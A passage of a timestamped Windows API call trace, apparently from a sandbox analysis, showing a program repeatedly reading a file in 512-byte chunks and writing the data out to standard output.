nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.324] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.324] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.324] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.324] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] GetFileType (hFile=0x50) returned 0x1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] GetFileType (hFile=0x50) returned 0x1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] WriteFile (in: hFile=0x50, 
lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] GetFileType (hFile=0x50) returned 0x1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] GetFileType (hFile=0x50) returned 0x1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] GetFileType (hFile=0x50) returned 0x1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] GetFileType (hFile=0x50) returned 0x1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] GetFileType (hFile=0x50) returned 0x1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] GetFileType (hFile=0x50) returned 0x1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.326] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.326] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.326] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.326] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] GetFileType (hFile=0x50) returned 0x1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] GetFileType (hFile=0x50) returned 0x1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] GetFileType (hFile=0x50) returned 0x1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 
[0151.326] GetFileType (hFile=0x50) returned 0x1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] GetFileType (hFile=0x50) returned 0x1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] GetFileType (hFile=0x50) returned 0x1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] GetFileType (hFile=0x50) returned 0x1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] GetFileType (hFile=0x50) returned 0x1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.327] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.327] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.327] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.327] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] GetFileType (hFile=0x50) returned 0x1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] GetFileType (hFile=0x50) returned 0x1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] GetFileType (hFile=0x50) returned 0x1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] GetFileType (hFile=0x50) returned 0x1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] GetFileType (hFile=0x50) returned 0x1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: 
lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] GetFileType (hFile=0x50) returned 0x1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] GetFileType (hFile=0x50) returned 0x1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] GetFileType (hFile=0x50) returned 0x1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.329] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.329] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.329] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.329] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.329] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.329] GetFileType (hFile=0x50) returned 0x1 [0151.329] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: 
lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.329] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.329] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.329] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.329] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, 
lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, 
lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile 
(in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 
[0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, 